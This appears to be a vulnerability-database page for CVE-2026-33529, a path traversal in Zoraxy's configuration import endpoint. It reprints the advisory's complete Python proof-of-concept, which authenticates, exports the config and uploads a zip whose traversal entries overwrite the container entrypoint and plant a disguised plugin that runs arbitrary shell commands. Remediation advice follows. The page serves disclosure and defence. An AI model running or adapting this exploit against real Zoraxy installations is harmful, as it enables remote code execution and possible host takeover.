Skip to main content

Docker CVE-2026-33529

LOW
Path Traversal (CWE-22)
2026-03-25 https://github.com/tobychui/zoraxy
3.3
CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY
3.3 LOW
AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
High
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 25, 2026 - 20:17 vuln.today
Patch released
Mar 25, 2026 - 20:17 nvd
Patch available
CVE Published
Mar 25, 2026 - 20:04 nvd
LOW 3.3

DescriptionGitHub Advisory

Authenticated Path Traversal to RCE via Configuration Import

Summary

An authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin.

Details

The vulnerable endpoint is POST /api/conf/import.

The zip entry names sanitization is bypassed by embedding ../ inside a longer sequence so the replacement produces a new ../:

conf/..././..././entrypoint.py
  → ReplaceAll("../", "")  (match found at index 1 of "..././", leaving "../")
  → conf/../../entrypoint.py   ← passes HasPrefix check, escapes conf/

Using this endpoint, a new plugin can be written (persistent) and the entrypoint (non-persistent) can be edited to add execution permissions to the plugin. When the database is provided in the import, the program should exit to trigger a container restart (which does not happen because the entrypoint does not monitor the Zoraxy exit code). As a result, the container was manually restarted for the PoC to work.

PoC

python
import argparse
import io
import json
import re
import sys
import zipfile

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

INTRO_SPEC_JSON = json.dumps({
    "id": "com.attacker.evil",
    "name": "System Updater",
    "author": "System",
    "author_contact": "",
    "description": "Internal system update module",
    "url": "",
    "ui_path": "/ui",
    "type": 1,
    "version_major": 1,
    "version_minor": 0,
    "version_patch": 0,
    "permitted_api_endpoints": [],
})

LINUX_START_SH = """\
#!/bin/sh
INTRO_SPEC='{intro_spec}'

run_payload() {{
{payload_lines}
}}

case "$1" in
  -introspect)
    run_payload
    printf '%s\\n' "$INTRO_SPEC"
    exit 0
    ;;
  -configure=*)
    run_payload
    while true; do sleep 3600; done
    ;;
esac
"""

MALICIOUS_ENTRYPOINT_PY = """\
#!/usr/bin/env python3
import os, subprocess, signal, sys, time

try:
    subprocess.run({cmd_list}, shell=False)
except Exception:
    pass

try:
    os.chmod("/opt/zoraxy/plugin/evil/start.sh", 0o755)
except Exception:
    pass

zoraxy_proc = None
zerotier_proc = None

def getenv(key, default=None):
  return os.environ.get(key, default)

def run(command):
  try:
    subprocess.run(command, check=True)
  except subprocess.CalledProcessError as e:
    print(f"Command failed: {command} - {e}")
    sys.exit(1)

def popen(command):
  proc = subprocess.Popen(command)
  time.sleep(1)
  if proc.poll() is not None:
    print(f"{command} exited early with code {proc.returncode}")
    raise RuntimeError(f"Failed to start {command}")
  return proc

def cleanup(_signum, _frame):
  global zoraxy_proc, zerotier_proc
  if zoraxy_proc and zoraxy_proc.poll() is None:
    zoraxy_proc.terminate()
  if zerotier_proc and zerotier_proc.poll() is None:
    zerotier_proc.terminate()
  if zoraxy_proc:
    try:
      zoraxy_proc.wait(timeout=8)
    except subprocess.TimeoutExpired:
      zoraxy_proc.kill()
      zoraxy_proc.wait()
  if zerotier_proc:
    try:
      zerotier_proc.wait(timeout=8)
    except subprocess.TimeoutExpired:
      zerotier_proc.kill()
      zerotier_proc.wait()
  try:
    os.unlink("/var/lib/zerotier-one")
  except Exception:
    pass
  sys.exit(0)

def start_zerotier():
  global zerotier_proc
  config_dir = "/opt/zoraxy/config/zerotier/"
  zt_path = "/var/lib/zerotier-one"
  os.makedirs(config_dir, exist_ok=True)
  try:
    os.symlink(config_dir, zt_path, target_is_directory=True)
  except FileExistsError:
    pass
  zerotier_proc = popen(["zerotier-one"])

def start_zoraxy():
  global zoraxy_proc
  zoraxy_args = [
    "zoraxy",
    f"-autorenew={getenv('AUTORENEW', '86400')}",
    f"-cfgupgrade={getenv('CFGUPGRADE', 'true')}",
    f"-db={getenv('DB', 'auto')}",
    f"-docker={getenv('DOCKER', 'true')}",
    f"-earlyrenew={getenv('EARLYRENEW', '30')}",
    f"-enablelog={getenv('ENABLELOG', 'true')}",
    f"-fastgeoip={getenv('FASTGEOIP', 'false')}",
    f"-mdns={getenv('MDNS', 'true')}",
    f"-mdnsname={getenv('MDNSNAME', \"''\")}",
    f"-noauth={getenv('NOAUTH', 'false')}",
    f"-plugin={getenv('PLUGIN', '/opt/zoraxy/plugin/')}",
    f"-port=:{getenv('PORT', '8000')}",
    f"-sshlb={getenv('SSHLB', 'false')}",
    f"-version={getenv('VERSION', 'false')}",
    f"-webroot={getenv('WEBROOT', './www')}",
  ]
  zoraxy_proc = popen(zoraxy_args)

def main():
  signal.signal(signal.SIGTERM, cleanup)
  signal.signal(signal.SIGINT, cleanup)
  run(["update-ca-certificates"])
  if getenv("UPDATE_GEOIP", "false").lower() == "true":
    run(["zoraxy", "-update_geoip=true"])
  os.chdir("/opt/zoraxy/config/")
  if getenv("ZEROTIER", "false") == "true":
    start_zerotier()
  start_zoraxy()
  signal.pause()

if __name__ == "__main__":
  main()
"""


def get_csrf(host: str, session: requests.Session) -> tuple:
    r = session.get(f"{host}/login.html", timeout=10, verify=False)
    m = re.search(r'<meta[^>]+name=["\']zoraxy\.csrf\.Token["\'][^>]+content=["\']([^"\']+)["\']', r.text)
    if not m:
        m = re.search(r'<meta[^>]+content=["\']([^"\']+)["\'][^>]+name=["\']zoraxy\.csrf\.Token["\']', r.text)
    token = m.group(1) if m else r.headers.get("X-CSRF-Token", "")
    return token, f"{host}/login.html"


def authenticate(host: str, username: str, password: str,
                 session: requests.Session) -> bool:
    csrf, referer = get_csrf(host, session)
    print(f"    CSRF token  -> {csrf!r}")
    r = session.post(
        f"{host}/api/auth/login",
        data={"username": username, "password": password},
        headers={"X-CSRF-Token": csrf, "Referer": referer},
        timeout=10, verify=False,
    )
    print(f"    Login       -> HTTP {r.status_code}  {r.text[:120]!r}")
    return r.status_code == 200 and r.text.strip().strip('"').lower() in ("ok", "true")


def upload_zip(host: str, session: requests.Session, zip_bytes: bytes) -> tuple:
    csrf, referer = get_csrf(host, session)
    r = session.post(
        f"{host}/api/conf/import",
        files={"file": ("backup.zip", zip_bytes, "application/zip")},
        headers={"X-CSRF-Token": csrf, "Referer": referer},
        timeout=30, verify=False,
    )
    return r.status_code, r.text


def export_config(host: str, session: requests.Session) -> bytes | None:
    r = session.get(
        f"{host}/api/conf/export?includeDB=true",
        timeout=60, verify=False,
    )
    if r.status_code == 200 and len(r.content) > 100:
        return r.content
    return None


def build_zip(cmd: str, export_zip: bytes) -> bytes:
    traversal_ep = "conf/..././..././entrypoint.py"
    traversal_sh = "conf/..././..././plugin/evil/start.sh"

    payload_lines = "\n".join(f"  {line}" for line in cmd.splitlines()) or "  id > /tmp/pwned.txt"
    start_sh = LINUX_START_SH.format(
        intro_spec=INTRO_SPEC_JSON.replace("'", "'\\''"),
        payload_lines=payload_lines,
    )
    malicious_ep = MALICIOUS_ENTRYPOINT_PY.replace("{cmd_list}", repr(["sh", "-c", cmd]))

    buf = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(export_zip), "r") as src:
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            for item in src.infolist():
                zf.writestr(item, src.read(item.filename))
            zf.writestr(zipfile.ZipInfo(traversal_ep), malicious_ep.encode())
            zf.writestr(zipfile.ZipInfo(traversal_sh), start_sh.encode())
    buf.seek(0)
    return buf.read()


def main() -> None:
    parser = argparse.ArgumentParser(
        description="Zoraxy Authenticated RCE via Entrypoint Overwrite + Plugin Zip-Slip",
    )
    parser.add_argument("--host",  help="Target, e.g. http://192.168.1.10:8000")
    parser.add_argument("--user",  default="admin")
    parser.add_argument("--pass",  dest="password", default=None)
    parser.add_argument("--cmd", default="id > /tmp/pwned.txt",
                        help="Shell command to embed in the payload")
    args = parser.parse_args()

    if not args.host or not args.password:
        parser.error("--host and --pass are required")
    host = args.host.rstrip("/")

    print(f"\n[1] Authenticating as '{args.user}' at {host} ...")
    session = requests.Session()
    if not authenticate(host, args.user, args.password, session):
        print("[-] Authentication failed.")
        sys.exit(1)
    print("[+] Authenticated.")

    print(f"\n[2] Exporting live config ...")
    export_zip = export_config(host, session)
    if not export_zip:
        print("[-] Config export failed.")
        sys.exit(1)
    print("\n[3] Building malicious zip ...")
    zip_bytes = build_zip(args.cmd, export_zip)
    print(f"[+] Zip size: {len(zip_bytes):,} bytes")

    print(f"\n[4] Uploading via POST {host}/api/conf/import ...")
    code, body = upload_zip(host, session, zip_bytes)
    print(f"    HTTP {code}  {body[:200]!r}")
    if code != 200:
        print("[-] Upload failed.")
        sys.exit(1)
    print("[+] Files written")


if __name__ == "__main__":
    main()

Impact

Arbitrary file write leads to RCE by an authenticated user. Given that the Docker socket might be mapped, this issue can lead to full host takeover.

AnalysisAI

An authenticated path traversal vulnerability in Zoraxy's configuration import endpoint (POST /api/conf/import) allows authenticated users to write arbitrary files outside the intended config directory by exploiting insufficient zip entry name sanitization, enabling remote code execution through malicious plugin creation. The vulnerability affects Zoraxy versions prior to 3.3.2 and has a CVSS score of 3.3 due to high privilege requirements, but poses significant real-world risk because Docker socket mapping could facilitate host takeover. A functional proof-of-concept demonstrating full RCE via entrypoint modification and plugin execution is publicly available.

Technical ContextAI

The vulnerability exploits a path traversal weakness in the zip extraction logic of Zoraxy (pkg:go/github.com_tobychui_zoraxy), a Go-based reverse proxy and edge computing platform. The sanitization routine performs a simple ReplaceAll operation to remove '../' sequences from zip entry names, but this is bypassable by embedding traversal sequences as 'conf/..././..././entrypoint.py' which, after the first pass of sanitization, becomes 'conf/../../entrypoint.py' and passes the prefix check. This is classified as CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) and allows writing to arbitrary filesystem locations. Once attackers craft a malicious zip containing both an overwritten entrypoint.py (non-persistent, executed on container start) and a plugin directory structure, they can achieve persistent code execution by leveraging the Python entrypoint to make the plugin executable and invoke system commands.

RemediationAI

Immediately upgrade Zoraxy to version 3.3.2 or later from the official GitHub releases page at https://github.com/tobychui/zoraxy/releases/tag/v3.3.2. The vendor has applied proper sanitization logic to prevent zip-slip attacks. Until upgrades can be deployed, mitigate by restricting network access to the Zoraxy instance via firewall rules, limiting access to the /api/conf/import endpoint to trusted administrative networks only, enforcing strong authentication credentials, and disabling configuration import functionality if not actively required. Additionally, avoid mapping the Docker socket into Zoraxy containers unless absolutely necessary, as this significantly amplifies post-exploitation impact. Monitor configuration import logs for suspicious zip file uploads.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-33529 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy